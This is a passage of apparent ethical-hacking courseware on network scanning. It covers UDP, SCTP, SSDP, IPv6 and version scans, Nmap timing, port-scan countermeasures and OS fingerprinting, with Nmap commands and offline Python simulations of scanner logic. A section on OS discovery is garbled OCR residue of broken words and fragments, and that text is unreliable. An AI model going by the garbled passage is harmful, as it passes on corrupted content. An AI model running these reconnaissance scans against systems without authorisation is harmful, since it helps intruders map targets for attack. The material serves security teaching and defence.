▪ The UDP scan is less formal with regard to an open port because there is no overhead of a TCP handshake. However, if ICMP is responding to each unavailable port, the total number of frames can exceed that from a TCP scan. Microsoft-based OSs do not usually implement any ICMP rate limiting; hence, this scan operates very efficiently on Windows-based devices.

Disadvantage:
▪ The UDP scan provides port information only. If additional information of the version is needed, the scan must be supplemented with a version detection scan (-sV) or the OS fingerprinting option (-O).
▪ The UDP scan requires privileged access; hence, this scan option is only available on systems with the appropriate user permissions.
▪ Most networks have massive amounts of TCP traffic; as a result, the efficiency of the UDP scan is low. The UDP scan will locate open ports and provide the security manager with valuable information for identifying successful attacker invasions on open UDP ports owing to spyware applications, Trojan horses, and other malicious software.
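Why the UDP scan above is both ambiguous and slow, as an added example (not from the courseware or Nmap): a toy host answers probes the way the text describes (ICMP port unreachable for closed ports, silence for open ones) but rate-limits ICMP errors to one per second, a parameter I chose to stand in for RFC 1812-style limiting; the scanner must retransmit and, when it still hears nothing, can only report open|filtered. The ToyUdpHost class, the timing constants and the port lists are constructed for the demo.

```python
"""
Added example (not from the courseware): simulation of UDP port-state inference
against a host that rate-limits ICMP errors.  Nothing touches the network.
"""
# ICMP type 3 codes and the state each implies for a UDP probe (as in the text).
ICMP_UNREACH_STATE = {
    3: "closed",                                      # port unreachable
    1: "filtered", 2: "filtered", 9: "filtered", 10: "filtered", 13: "filtered",
}

class ToyUdpHost:
    """Closed ports answer ICMP type 3/code 3, but at most once per icmp_interval."""
    def __init__(self, open_ports=(), services=None, admin_prohibited=(), icmp_interval=1.0):
        self.open_ports = set(open_ports)          # bound, but the service stays silent
        self.services = dict(services or {})       # bound services that do answer a probe
        self.admin_prohibited = set(admin_prohibited)   # a filter answering code 13
        self.icmp_interval = icmp_interval         # assumed rate limit: one error per second
        self.last_icmp = -float("inf")

    def probe(self, port, now):
        """Return ('udp', payload), ('icmp', code) or None for no reply."""
        if port in self.services:
            return ("udp", self.services[port])
        if port in self.admin_prohibited:
            return ("icmp", 13)
        if port in self.open_ports:
            return None                            # open ports need not answer at all
        if now - self.last_icmp >= self.icmp_interval:
            self.last_icmp = now
            return ("icmp", 3)
        return None                                # rate limit hit: error never sent

def udp_scan(host, ports, retries=2, gap=0.5):
    """Probe each port, retransmitting unanswered probes; returns ({port: state}, elapsed)."""
    clock, results = 0.0, {}
    for port in ports:
        state = "open|filtered"                    # what silence after retries means
        for _ in range(retries + 1):
            reply = host.probe(port, clock)
            clock += gap
            if reply is None:
                continue                           # treat as lost and retransmit
            kind, value = reply
            state = "open" if kind == "udp" else ICMP_UNREACH_STATE.get(value, "filtered")
            break
        results[port] = state
    return results, clock

if __name__ == "__main__":
    host = ToyUdpHost(open_ports={53, 161}, services={123: b"ntp"}, admin_prohibited={69})
    res, elapsed = udp_scan(host, [53, 67, 68, 69, 123, 161, 162])
    print(res, f"elapsed {elapsed:.1f}s")
    # Without retransmission, rate-limited closed ports are misreported as open|filtered:
    print(udp_scan(ToyUdpHost(), [1, 2, 3], retries=0, gap=0.2)[0])
```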
SCTP INIT Scanning

Stream Control Transport Protocol (SCTP) is a reliable message-oriented transport layer protocol. It is used as an alternative to the TCP and UDP protocols, as its characteristics are similar to those of TCP and UDP. SCTP is specifically used to perform multi-streaming and multi-homing activities. Some SCTP applications include VoIP, IP telephony, and Signaling System 7/SIGnaling TRANsport (SS7/SIGTRAN)-related services. An SCTP association comprises a four-way handshake method, as shown in the screenshot below.

Figure 3.66: SCTP four-way handshake (client-server association)

In SCTP, the INIT scan is performed quickly by scanning thousands of ports per second on a fast network not obstructed by a firewall, offering a stronger sense of security. The SCTP INIT scan is very similar to the TCP SYN scan; comparatively, it is also stealthy and unobtrusive, as it cannot complete SCTP associations, hence making the connection half-open. Attackers send an INIT chunk to the target host. If the port is listening or open, it sends an acknowledgement as an INIT+ACK chunk.

Figure 3.67: SCTP INIT scan result when a port is listening (Open): INIT chunk from attacker, INIT+ACK chunk from target host

If the target is inactive and it is not listening, then it sends an acknowledgement as an ABORT chunk.

Figure 3.68: SCTP INIT scan result when a port is not listening (Closed): INIT chunk from attacker, ABORT chunk from target host

After several retransmissions, if there is no response, then the port is indicated as a filtered port. The port is also indicated as a filtered port if the target server responds with an ICMP unreachable exception (type 3, code 0, 1, 2, 3, 9, 10, or 13). In Zenmap, the -sY option is used to perform the SCTP INIT scan.

Advantages:
▪ The INIT scan can clearly differentiate between various port states, such as open, closed, and filtered

Figure 3.69: SCTP INIT scan in Zenmap
SCTP COOKIE ECHO Scanning

The SCTP COOKIE ECHO scan is a more advanced type of scan. In this type of scan, attackers send the COOKIE ECHO chunk to the target, and if the target port is open, it will silently drop the packets onto the port and you will not receive any response from the target. If the target sends back the ABORT chunk response, then the port is considered as a closed port. The COOKIE ECHO chunk is not blocked by non-stateful firewall rulesets as in the INIT scan. Only an advanced IDS can detect the SCTP COOKIE ECHO scan. In Zenmap, the -sZ option is used to perform the SCTP COOKIE ECHO scan.

Figure 3.70: SCTP COOKIE ECHO scan result when port is open (COOKIE ECHO chunk from attacker; no response from target host)

Figure 3.71: SCTP COOKIE ECHO scan result when port is closed (COOKIE ECHO chunk from attacker; ABORT chunk from target host)

Advantages:
▪ The port scan is not as conspicuous as the INIT scan.

Disadvantages:
▪ The SCTP COOKIE ECHO scan cannot differentiate clearly between open and filtered ports, and it shows the output as open|filtered in both cases.

Figure 3.72: SCTP COOKIE-ECHO scan in Zenmap (Command: nmap -sZ -v 10.10.10.10)
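The SCTP INIT and COOKIE ECHO behaviour described in the two sections above, modelled as an added example (not from the courseware or Nmap): a toy endpoint that completes the four-way association handshake for a legitimate client, answers an INIT probe with INIT-ACK (listening) or ABORT (closed), and silently drops a COOKIE ECHO probe on a listening port. The cookie check (an HMAC over peer address and port under a server key) is my assumption to explain the silent drop; the ToySctpEndpoint class, port numbers and key are constructed for the demo.

```python
"""
Added example (not from the courseware): toy SCTP endpoint showing why an INIT
scan can separate open/closed/filtered while a COOKIE ECHO scan cannot
separate open from filtered.  No real SCTP sockets are used.
"""
import hashlib
import hmac
import os

class ToySctpEndpoint:
    """One SCTP host: listening ports, closed ports, and ports behind a silent filter."""
    def __init__(self, listening_ports, dropped_ports=(), secret=None):
        self.listening = set(listening_ports)
        self.dropped = set(dropped_ports)          # a stateless filter discarding probes
        self.secret = secret or os.urandom(16)     # assumed key for the state cookie

    def _cookie(self, peer, port):
        # Assumed cookie construction: MAC over peer address and port under a server key.
        return hmac.new(self.secret, f"{peer}:{port}".encode(), hashlib.sha256).digest()

    def handle(self, chunk, port, peer, cookie=None):
        """Return what is sent back: a chunk name, ('INIT-ACK', cookie), or None (silence)."""
        if port in self.dropped:
            return None                            # filtered: nothing ever comes back
        if port not in self.listening:
            return "ABORT"                         # closed port: every chunk gets ABORT
        if chunk == "INIT":
            return ("INIT-ACK", self._cookie(peer, port))   # cookie rides inside INIT-ACK
        if chunk == "COOKIE-ECHO":
            if cookie is not None and hmac.compare_digest(cookie, self._cookie(peer, port)):
                return "COOKIE-ACK"                # genuine fourth step of the handshake
            return None                            # unsolicited/bogus cookie: dropped silently
        return None

def init_scan(endpoint, port, peer="10.10.10.5"):
    """INIT probe interpreted as in the text (retransmissions collapsed into one call)."""
    reply = endpoint.handle("INIT", port, peer)
    if reply is None:
        return "filtered"
    return "open" if isinstance(reply, tuple) else "closed"

def cookie_echo_scan(endpoint, port, peer="10.10.10.5"):
    """A COOKIE ECHO probe only distinguishes closed from everything else."""
    reply = endpoint.handle("COOKIE-ECHO", port, peer)
    return "closed" if reply == "ABORT" else "open|filtered"

def full_association(endpoint, port, peer="10.10.10.5"):
    """The legitimate four-way handshake, for contrast with the half-open probe."""
    reply = endpoint.handle("INIT", port, peer)
    if not isinstance(reply, tuple):
        return reply
    _, cookie = reply
    return endpoint.handle("COOKIE-ECHO", port, peer, cookie=cookie)

if __name__ == "__main__":
    ep = ToySctpEndpoint(listening_ports={2905}, dropped_ports={3868})
    for port in (2905, 2906, 3868):
        print(port, "INIT scan:", init_scan(ep, port),
              "| COOKIE ECHO scan:", cookie_echo_scan(ep, port),
              "| association:", full_association(ep, port))
```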
SSDP and List Scanning

SSDP Scanning

Simple Service Discovery Protocol (SSDP) is a network protocol that generally communicates with machines when querying them with routable IPv4 or IPv6 multicast addresses. The SSDP service controls communication for the Universal Plug and Play (UPnP) feature. It generally works when the machine is not firewalled; however, it can sometimes work through a firewall. The SSDP service will respond to a query sent over IPv4 or IPv6 broadcast addresses. This response includes information about the UPnP feature associated with it. The attacker uses SSDP scanning to detect UPnP vulnerabilities that may allow him/her to launch buffer overflow or DoS attacks.

Figure 3.73: UPnP SSDP M-SEARCH in Parrot Security

The attacker may use the UPnP SSDP M-SEARCH information discovery tool to check whether the machine is vulnerable to UPnP exploits. The UPnP SSDP M-SEARCH information discovery tool gleans information from UPnP-enabled systems, as shown in the figure.

List Scanning

In a list scan, the discovery of the active network host is indirect. A list scan simply generates and prints a list of IPs/Names without actually pinging or scanning the hosts. As a result, the list scan shows all IP addresses as "not scanned" (0 hosts up). By default, a reverse DNS resolution is still carried out on each host by Nmap to learn their names. In Zenmap, the -sL option is used to perform a list scan.

Figure 3.74: List scan using Zenmap (Command: nmap -sL 10.10.10.10)

Advantages:
▪ A list scan can perform a good sanity check.
▪ The list scan detects incorrectly defined IP addresses in the command line or in an option file. It primarily repairs the detected errors before running any "active" scan.
IPv6 Scanning

IPv6 increases the size of the IP address space from 32 bits to 128 bits to support higher levels of the addressing hierarchy. Traditional network scanning techniques are computationally less feasible because of the larger search space (64 bits of host address space, or 2^64 addresses) provided by IPv6 in a subnet. Scanning the IPv6 network is more difficult and complex compared to IPv4. Additionally, a number of scanning tools do not support ping sweeps on IPv6 networks. Attackers need to harvest IPv6 addresses from network traffic, recorded logs, or "Received from" and other header lines in archived email or Usenet news messages to identify IPv6 addresses for subsequent port scanning. However, scanning an IPv6 network provides a large number of hosts in a subnet; if an attacker can compromise one host in the subnet, he/she can probe the "all hosts" link local multicast address if the host numbers are sequential or use any regular scheme. An attacker needs to analyze 2^64 addresses to verify if a particular open service is running on a host in that subnet. At a conservative rate of one probe per second, such a scan would take about 5 billion years to complete. Attackers use Nmap to perform IPv6 scanning. In Zenmap, the -6 option is used to perform the IPv6 scan.

Figure 3.75: IPv6 scan in Zenmap
Service Version Discovery

Every port is assigned a specific service, and every service has its own version. Some versions of the protocols are insecure, and they can allow attackers to compromise the machine by exploiting this vulnerability. Service version detection helps attackers to obtain information about the running services and their versions on a target system. By obtaining accurate service version numbers, an attacker can determine which exploits the target system is vulnerable to. For example, when the attacker detects the SMBv1 protocol as a running service on the target Windows machine, then he/she can easily perform a WannaCry ransomware attack with the help of the EternalBlue and DoublePulsar backdoor combination in Metasploit.

The version detection technique of Nmap is nothing but the examination of the various TCP and UDP services. The service-probes database is used for querying, and matching expressions are used for recognizing and parsing responses. In Zenmap, the -sV option is used to detect service versions.

Figure: Service version discovery using Zenmap (Command: nmap -sV 10.10.10.10; the output lists 135/tcp msrpc, 139/tcp netbios-ssn, 445/tcp microsoft-ds (workgroup: WORKGROUP) and 5357/tcp http, Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP), as open Microsoft Windows services)
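How the probe-and-match step of version detection works, as an added example (not code from the courseware and not Nmap's nmap-service-probes file): each signature pairs a regular expression with product and version templates that are filled from the matched groups, and a second function parses the "port/proto state service version" lines of the kind shown in the -sV screenshot so a defender can diff them against an inventory. The signatures, the SAMPLE_BANNERS and the helper names are constructed for the demo.

```python
"""
Added example (not from the courseware): a minimal banner-to-version matcher in
the spirit of Nmap's service-probes database, plus a parser for -sV port lines.
Signatures and banners below are constructed, not copied from Nmap.
"""
import re

# (service, regex over the banner bytes, product template, version template).
# "$1", "$2" in a template are replaced by the corresponding regex groups.
SIGNATURES = [
    ("ssh",  re.compile(rb"^SSH-2\.0-OpenSSH_([\w.]+)"), "OpenSSH", "$1"),
    ("ftp",  re.compile(rb"^220 .*vsFTPd ([\d.]+)"), "vsftpd", "$1"),
    ("http", re.compile(rb"^HTTP/1\.[01] \d{3}.*\r\nServer: ([^/\r\n]+)/([\d.]+)", re.S),
             "$1", "$2"),
    ("smtp", re.compile(rb"^220 ([\w.-]+) ESMTP Postfix"), "Postfix smtpd", None),
]

def _fill(template, match):
    """Substitute $n placeholders with regex groups; None stays None."""
    if template is None:
        return None
    out = template
    for i in range(1, match.re.groups + 1):
        out = out.replace(f"${i}", match.group(i).decode(errors="replace"))
    return out

def match_banner(banner: bytes):
    """Return {'service','product','version'} for the first matching signature, else None."""
    for service, regex, product, version in SIGNATURES:
        m = regex.search(banner)
        if m:
            return {"service": service, "product": _fill(product, m),
                    "version": _fill(version, m)}
    return None

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp|sctp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_ports(nmap_output: str):
    """Parse 'port/proto state service version' lines from -sV output into dicts."""
    rows = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append({"port": int(m.group(1)), "proto": m.group(2),
                         "state": m.group(3), "service": m.group(4),
                         "version": m.group(5).strip()})
    return rows

# Constructed sample banners, keyed by port.
SAMPLE_BANNERS = {
    22: b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\r\n",
    21: b"220 (vsFTPd 3.0.3)\r\n",
    80: b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.29 (Ubuntu)\r\n\r\n",
    25: b"220 mail.example.test ESMTP Postfix\r\n",
}

# Constructed -sV style output lines.
SAMPLE_NMAP_OUTPUT = """\
135/tcp  open  msrpc        Microsoft Windows RPC
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
"""

if __name__ == "__main__":
    for port, banner in SAMPLE_BANNERS.items():
        print(port, match_banner(banner))
    for row in parse_nmap_ports(SAMPLE_NMAP_OUTPUT):
        print(row)
```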
Nmap Scan Time Reduction Techniques

In Nmap, performance and accuracy take high priority, and this can be achieved only by reducing the long scan time. The important techniques for reducing the scan time are as follows:

▪ Omit Non-critical Tests

While performing the Nmap scan, the time complexity can be reduced by the following methods:
  ○ Avoiding an intense scan if only a minimal amount of information is required.
  ○ The number of ports scanned can be limited using specific commands.
  ○ The port scan (-sn) can be skipped if and only if one has to check whether the hosts are online or not.
  ○ Advanced scan types (-sC, -sV, --traceroute, and -A) can be avoided.
  ○ The DNS resolution should be turned on only when it is necessary.

▪ Optimize Timing Parameters

To control the scan activity, Nmap provides the -T option for scanning ranging from high-level to low-level timing aggressiveness. This can be extremely useful for scanning highly filtered networks.

▪ Separate and Optimize UDP Scans

As many vulnerable services use the UDP protocol, scanning the UDP protocol is vital, and it should be scanned separately, as TCP scans have different performance requirements and timing characteristics. Moreover, the UDP scan is more affected by the ICMP error rate-limiting compared to the TCP scan.

▪ Upgrade Nmap

It is always advisable to use the upgraded version of Nmap, as it contains many bug fixes, important algorithmic enhancements, and high-performance features such as local network ARP scanning.

▪ Execute Concurrent Nmap Instances

Running Nmap against the whole network usually makes the system slower and less efficient. Nmap supports parallelization, and it can also be customized according to specific needs. It becomes very efficient by getting an idea of the reliability of the network while scanning a larger group. The overall speed of the scan can be improved by dividing it into many groups and running them simultaneously.

▪ Scan from a Favorable Network Location

It is always advisable to run Nmap from the local network when scanning the target host's internal network, as it offers defense-in-depth security. External scanning is obligatory in firewall testing or when the network should be monitored from the external attacker's viewpoint.

▪ Increase Available Bandwidth and CPU Time

By increasing the available bandwidth or CPU power, the Nmap scan time can be reduced. This is done by installing a new data line or stopping any running applications. Nmap has its own congestion control algorithms, so that network flooding can be prevented. This improves its accuracy. The Nmap bandwidth usage can be tested by running it in the verbose mode -v.
Port Scanning Countermeasures

As discussed previously, port scanning provides a large amount of useful information to the attacker, such as IP addresses, host names, open ports, and services running on ports. Open ports specifically offer an easy means for the attacker to break into the network. However, there is no cause for concern, provided that you secure your system or network against port scanning by adopting the following countermeasures:

▪ Configure firewall and IDS rules to detect and block probes.
▪ The firewall should be capable of detecting probes sent by the attackers using port scanning tools. It should not allow traffic to pass through it after simply inspecting the TCP header. The firewall should be able to examine the data contained in each packet before allowing the traffic to pass through it.
▪ Run the port scanning tools against hosts on the network to determine whether the firewall accurately detects the port scanning activity.
▪ Some firewalls do a better job than others in terms of detecting stealth scans. For example, many firewalls have specific options to detect SYN scans, while others completely ignore FIN scans.
▪ Ensure that the router, IDS, and firewall firmware are updated with their latest releases/versions.
▪ Configure commercial firewalls to protect your network against fast port scans and SYN floods. You can run tools such as portsentry to detect and stop port scan attempts on Linux/UNIX systems.
▪ Hackers use tools such as Nmap and perform OS detection to sniff the details of a remote OS. Thus, it is important to employ intrusion detection systems in such cases. Snort (https://www.snort.org) is an intrusion detection and prevention technology that is very useful, mainly because signatures are frequently available from the public authors.
▪ Keep as few ports open as possible and filter the rest, as the intruder will try to enter through any open port. Use a custom ruleset to lock down the network, block unwanted ports at the firewall, and filter the following ports: 135-159, 256-258, 389, 445, 1080, 1745, and 3268.
▪ Block unwanted services running on the ports and update the service versions.
▪ Ensure that the versions of services running on the ports are non-vulnerable.
▪ Block inbound ICMP message types and all outbound ICMP type-3 unreachable messages at border routers arranged in front of a company's main firewall.
▪ Attackers try to perform source routing and send packets to the targets (which may not be reachable via the Internet) using an intermediate host that can interact with the target. Hence, it is necessary to ensure that your firewall and router can block such source-routing techniques.
▪ Ensure that the mechanism used for routing and filtering at the routers and firewalls, respectively, cannot be bypassed using a particular source port or source-routing methods.
▪ Test your IP address space using TCP and UDP port scans as well as ICMP probes to determine the network configuration and accessible ports.
▪ Ensure that the anti-scanning and anti-spoofing rules are configured.
▪ If a commercial firewall is in use, then ensure that
  ○ It is patched with the latest updates
  ○ It has correctly defined antispoofing rules
  ○ Its fast mode services are unusable in Check Point Firewall-1 environments
Module Flow: Scanning Tools; OS Discovery (Banner Grabbing/OS Fingerprinting); Scanning Beyond IDS and Firewall

OS Discovery (Banner Grabbing/OS Fingerprinting)

An attacker uses OS discovery or banner grabbing techniques to identify the OS and application versions running on network hosts and their types, along with tools and known exploits for them. This section introduces you to banner grabbing, as well as useful countermeasures that you can adopt against it.
OSDiscovery/Banner
Grabbing
target
oyster.
There
two
ar typesofbannerpabbingatv
the
isthemethod usedto determine
andpaseoperating
system on remote
running

AotiveBannerGrabbing BannerGrabbing
Passive

Specay
crafted
packets
resent
remote
Sanner
grabbing
from tothe OSand erormestogs

etermine
‘he
ndae
the
are than
responses
the08
with database
compared to te
Siting
5, So
networt

implementation
atheTCP/IP
sobbing
stack
rom
page Sonne ertensins

8 Discovery/Banner
Grabbing
Banner
grabbing,
“OS
a remotetarget
probability
or fingerprinting,―
system.
is a methodusedto determinethe OS
It is an importantscanningmethod,as theattacker
of successif the OSof the targetsystemis known(many
that is running on
will havea higher
vulnerabilitiesare OS-
The attacker
specific). can then formulatean attackstrategy basedon the OSof the target
system,
Thereare two methodsfor bannergrabbing:
spottingthe bannerwhile tryingto connect to @
service, suchas an FTPsite, and downloading
the binaryfile/bin/lsto checkthe system
architecture.
more advanced
‘A fingerprinting
technique dependso n stackquerying,whichtransfersthe

packetsto the networkhostandevaluates them bythe reply.Thefirststack-queryingmethod


designedwith regardto the TCPmodeof communication evaluatesthe responseto connection
requests,
Thenext method,
number identifies
knownas initial sequence
generators
random
number(ISN)
found i n the TCPstack.
analysis, the differences
in

ICMP
response
analysis
method an of
fingerprint consistssending
is another usedto
messagesto a remote hostandevaluating
the reply.
OS.It ICMP

of bannergrabbing
Two types techniques
are described
below:
=
ActiveBannerGrabbing
bannergrabbing
‘Active applies that an OS'sIP stackhasa uniqueway of
the principle
respondingto specially
crafted TCPpackets.
This happensbecauseof different
thatvendorsapply
interpretations whileimplementing stackon a particular
the TCP/IP

ical andCountermensores
Mackin ©by E-Comel
Copyright
In active banner grabbing, the attacker sends a variety of malformed packets to the remote host, and the responses are compared with a database. Responses from different OSs vary because of differences in TCP/IP stack implementation. For instance, the scanning utility Nmap uses a series of nine tests to determine an OS fingerprint or banner grabbing. The tests listed below provide some insights into an active banner grabbing attack, as described at www.packetwatch.net:

o Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP port.
o Test 2: A TCP packet with no flags enabled is sent to an open TCP port. This type of packet is a NULL packet.
o Test 3: A TCP packet with the URG, PSH, SYN, and FIN flags enabled is sent to an open TCP port.
o Test 4: A TCP packet with the ACK flag enabled is sent to an open TCP port.
o Test 5: A TCP packet with the SYN flag enabled is sent to a closed TCP port.
o Test 6: A TCP packet with the ACK flag enabled is sent to a closed TCP port.
o Test 7: A TCP packet with the URG, PSH, and FIN flags enabled is sent to a closed TCP port.
o Test 8 PU (Port Unreachable): A UDP packet is sent to a closed UDP port. The objective is to extract an "ICMP port unreachable" message from the target machine.
o Test 9 TSeq (TCP Sequenceability test): This test tries to determine the sequence generation patterns of the TCP initial sequence numbers (also known as TCP ISN sampling), the IP identification numbers (also known as IPID sampling), and the TCP timestamp numbers. It sends six TCP packets with the SYN flag enabled to an open TCP port.

The objective of these tests is to find patterns in the initial sequence of numbers that the TCP implementations chose while responding to a connection request. They can be categorized into groups, such as traditional 64K (many old UNIX boxes), random increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others), or true random (Linux 2.0.*, OpenVMS, newer AIX, etc.). Windows boxes use a "time-dependent" model in which the ISN is incremented by a fixed amount for each occurrence.
Passive Banner Grabbing

Source: https://www.symantec.com

Like active banner grabbing, passive banner grabbing also depends on the differential implementation of the stack and the various ways in which an OS responds to packets. However, instead of relying on scanning the target host, passive fingerprinting captures packets from the target host via sniffing to study telltale signs that can reveal an OS.

Passive banner grabbing includes:

o Banner grabbing from error messages: Error messages provide information, such as type of server, type of OS, and SSL tools used by the target remote system.
o Sniffing the network traffic: Capturing and analyzing packets from the target enables an attacker to determine the OS used by the remote system.
o Banner grabbing from page extensions: Looking for an extension in the URL may help in determining the application version. For example, .aspx => IIS server and Windows platform.

The four areas that typically determine the OS are given below:

o TTL (time to live) of the packets: What does the OS set as the Time To Live on the outbound packet?
o Window Size: What is the Window Size set by the OS?
o Whether the DF (Don't Fragment) bit is set: Does the OS set the DF bit?
o TOS (Type of Service): Does the OS set the TOS, and if so, what setting is it?
Passive fingerprinting is neither fully accurate nor limited to these four signatures. However, one can improve its accuracy by looking at several signatures and combining the information. The following is an analysis of a sniffed packet described by Lance Spitzner in his paper on passive fingerprinting (https://www.symantec.com/connect/articles/passive-fingerprinting):

04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257
***PS*A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78
According to the four criteria, the following are identified:

o TTL: 45
o Window Size: 0x7D78 (or 32120 in decimal)
o DF: The DF bit is set
o TOS: 0x0

Compare this information with a database of signatures.
o TTL: The TTL from the original analysis is 45. The packet appears to have gone through 19 hops to get to the target, so the original TTL that the user sent was set to 64. Based on this TTL, it appears that the packet was sent from a Linux or FreeBSD box (however, more system signatures need to be added to the database). This TTL can be confirmed by performing a traceroute to the remote host. If the trace needs to be performed stealthily, the traceroute TTL (default 30 hops) can be set to one or two hops fewer than the remote host (-m option). Setting the traceroute in this manner reveals the path information (including the upstream provider) without actually contacting the remote host.
o Window Size: In this step, the window sizes are compared. The window size is another effective tool for determining precisely what window size is used and how often it is changed. In the previous signature, the window size is set at 0x7D78, which is the default window size used by Linux. In addition, FreeBSD and Solaris tend to maintain the same window size throughout a session. However, Cisco routers and Microsoft Windows NT window sizes constantly change. The window size is more accurate when measured after the initial three-way handshake (due to TCP slow start).
o DF bit: Most systems use the DF bit set; hence, this is of limited value. However, this makes it easier to identify a few systems that do not use the DF flag (such as SCO or OpenBSD).
o TOS: TOS is also of limited value, as it seems to be more session-based than OS-based. In other words, it is not so much the OS as the protocol used that determines the TOS to a large extent.

Using the information obtained from the packet, specifically the TTL and the window size, one can compare the results with the database of signatures and determine the OS with some degree of confidence (in this case, Linux kernel 2.2.x).

Passive fingerprinting, like active fingerprinting, has some limitations. First, applications that build their own packets (e.g., Nmap, Hunt, Nemesis, etc.) will not use the same signatures as the OS. Second, it is relatively simple for a remote host to adjust the TTL, window size, DF, or TOS setting on the packets.

Passive fingerprinting has several other uses. For example, attackers can use stealthy fingerprinting to determine the OS of a potential target such as a web server. A user only needs to request a web page from the server and then analyze the sniffer traces. This bypasses the need for using an active tool that various IDS systems can detect. Passive fingerprinting also helps in identifying remote proxy firewalls. It may be possible to ID proxy firewalls from the signatures as discussed above, simply because proxy firewalls rebuild connections for clients. Similarly, passive fingerprinting can be used to identify rogue systems.

Note: We will discuss passive banner grabbing in later modules.

Why Banner Grabbing?

An attacker uses banner grabbing to identify the OS used on the target host and thus determine the system vulnerabilities and exploits that might work on that system to carry out further attacks.


How to Identify Target System OS

Identifying the target OS is one of the important tasks for an attacker to compromise the target network/machine. In a network, various standards are implemented to allow different OSs to communicate with each other. These standards govern the functioning of various protocols such as IP, TCP, UDP, etc. By analyzing certain parameters/fields in these protocols, one can reveal details of the OS. Parameters such as Time to Live (TTL) and TCP window size in the IP header of the first packet in a TCP session help identify the OS running on the target machine. The TTL field determines the maximum time that a packet can remain in a network, and the TCP window size determines the length of the packet reported. These values vary among OSs, as described in the following table:
Operating System                        Time To Live   TCP Window Size
Linux (Kernel 2.4 and 2.6)              64             5840
Google Linux                            64             5720
FreeBSD                                 64             65535
OpenBSD                                 64             16384
Windows 95                              32             8192
Windows 2000                            128            16384
Windows XP                              128            65535
Windows 98, Vista, and 7 (Server 2008)  128            8192
iOS 12.4 (Cisco Routers)                255            4128
Solaris 7
AIX 4.3                                 64

Table 3.3: TTL and TCP Window Size values for OS

Attackers can use various tools to perform OS discovery on the target machine, including Wireshark, Nmap, Unicornscan, and Nmap Script Engine. Attackers can also adopt the IPv6 fingerprinting method to grab the target OS details.
OS Discovery using Wireshark

Source: https://www.wireshark.org

To identify the target OS, sniff/capture the response generated from the target machine to the request-originated machine using packet-sniffing tools such as Wireshark, etc., and observe the TTL and TCP window size fields in the first captured TCP packet. By comparing these values with those in the above table, you can determine the target OS that has generated the response.
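As an added worked example (not code from the courseware), the following Python script applies the passive analysis of the Spitzner packet and the Wireshark check above to a packet summary: it parses a Snort-style TCP line, derives the initial TTL and hop count, and matches TTL and window size against the rows of Table 3.3. Both packet summaries are constructed; the first reproduces the Spitzner packet with DF appended because the analysis states the bit was set, and the second is an invented Windows-like host.

```python
import re
from dataclasses import dataclass
from typing import List

# Default (initial TTL, TCP window size, OS) values copied from Table 3.3.
# Rows whose numbers were not legible in the table are left out.
SIGNATURES = [
    (64, 5840, "Linux (Kernel 2.4 and 2.6)"),
    (64, 5720, "Google Linux"),
    (64, 65535, "FreeBSD"),
    (64, 16384, "OpenBSD"),
    (32, 8192, "Windows 95"),
    (128, 16384, "Windows 2000"),
    (128, 65535, "Windows XP"),
    (128, 8192, "Windows 98, Vista, and 7 (Server 2008)"),
    (255, 4128, "iOS 12.4 (Cisco Routers)"),
]

# Initial TTLs that operating systems commonly start from.
INITIAL_TTLS = (32, 64, 128, 255)

# Snort-style TCP summary, in the layout of the Lance Spitzner sample above.
_PACKET_RE = re.compile(
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)\s*"
    r"TCP\s+TTL:(?P<ttl>\d+)\s+TOS:(?P<tos>0x[0-9A-Fa-f]+)\s+ID:(?P<ipid>\d+)"
    r"(?P<df>\s+DF)?\s*(?P<flags>[A-Z*12]{8})\s+"
    r"Seq:\s*0x[0-9A-Fa-f]+\s+Ack:\s*0x[0-9A-Fa-f]+\s+Win:\s*(?P<win>0x[0-9A-Fa-f]+)"
)


@dataclass
class PassiveSignature:
    """The four passive fingerprinting fields, plus the derived hop count."""
    ttl: int
    initial_ttl: int
    hops: int
    window: int
    df: bool
    tos: int


def guess_initial_ttl(ttl: int) -> int:
    """Smallest common initial TTL that is >= the observed TTL.

    A TTL of 45 therefore implies an initial TTL of 64 and 19 hops, which is
    the reasoning applied to the sample packet above.
    """
    if not 0 < ttl <= 255:
        raise ValueError(f"invalid TTL {ttl}")
    return next(start for start in INITIAL_TTLS if ttl <= start)


def parse_packet(summary: str) -> PassiveSignature:
    """Extract TTL, window size, DF and TOS from a Snort-style TCP summary."""
    match = _PACKET_RE.search(summary)
    if match is None:
        raise ValueError("not a TCP packet summary in the expected format")
    ttl = int(match.group("ttl"))
    initial = guess_initial_ttl(ttl)
    return PassiveSignature(
        ttl=ttl,
        initial_ttl=initial,
        hops=initial - ttl,
        window=int(match.group("win"), 16),
        df=match.group("df") is not None,
        tos=int(match.group("tos"), 16),
    )


def match_os(sig: PassiveSignature) -> List[str]:
    """Candidate OSs from Table 3.3.

    Prefers rows where both initial TTL and window size agree; when the window
    is not in the table (as for the 0x7D78 sample) it falls back to TTL only.
    """
    both = [name for ttl, win, name in SIGNATURES
            if ttl == sig.initial_ttl and win == sig.window]
    if both:
        return both
    return [name for ttl, win, name in SIGNATURES if ttl == sig.initial_ttl]


# Constructed sample inputs. The first reproduces the Spitzner packet quoted
# above, with " DF" appended because the analysis states the DF bit was set;
# the second is invented to look like a Windows host 12 hops away.
SAMPLE_LINUX = """04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257 DF
***PS*A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78
"""
SAMPLE_WINDOWS = """06/01-10:02:11.000001 198.51.100.7:443 -> 172.16.1.107:51514
TCP TTL:116 TOS:0x0 ID:4097 DF
***A**S* Seq: 0x1A2B3C4D Ack: 0x0000F00D Win: 0x2000
"""

if __name__ == "__main__":
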